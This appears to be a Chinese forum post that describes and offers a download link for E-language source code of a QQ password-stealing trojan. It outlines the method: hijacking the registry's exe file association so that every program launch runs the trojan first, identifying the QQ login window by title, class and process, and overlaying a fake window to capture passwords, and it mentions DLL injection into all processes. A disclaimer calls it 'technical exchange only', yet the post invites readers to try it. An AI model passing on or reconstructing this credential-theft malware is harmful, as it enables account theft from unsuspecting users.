QQx马程序,早期估计就是模仿QQ登录窗口钓鱼。后期逐渐升级为hook、消息劫持。注入等。随着网路i杀软不断的更新,做牧马已经没有好大必要了。
易语言开发的这个程序,阿拉是通过修改系统下的某个DLL文件达到,运行所有可执行的程序都注入dll文件,dll文件在通过窗口标题、类名。进程等分析是否是QQ登录窗口。然后在进行破坏性操作抓取QQ密码。
这个易语言源码的原理也类似与这样,通过修改注册表exe类。达到运行所有exe文件都先执行我们得牧马程序,在去判断执行的是什么程序,如果是QQ就进行载取破坏。当然这个源码现在可能用处已经不大。现在杀软基本都有主动防御,但是想试试的朋友可以下载源码分析。
这个源码不是通过假冒QQ登录窗口钓鱼,而是比这高级一点的窗口覆盖,具体看源码吧。这个源码好像更新与2010年停止。已经比较落后了,但是对于易语言来说应该算是一个开阔者。
[attachment=6819088]
[b][size=5][backcolor=#00b0f0][color=#ffffff]注意请勿违法操作,源码仅供技术交流[/color][/backcolor][/size][/b]
[b][size=5][backcolor=#00b0f0][color=#ffffff]
[/color][/backcolor][/size][/b]
[size=5][backcolor=#ff0000][color=#ffffff][b]下载地址[/b][/color][/backcolor][/size][b][size=3][url]http://www.400gb.com/file/19931506[/url] [/size][/b]
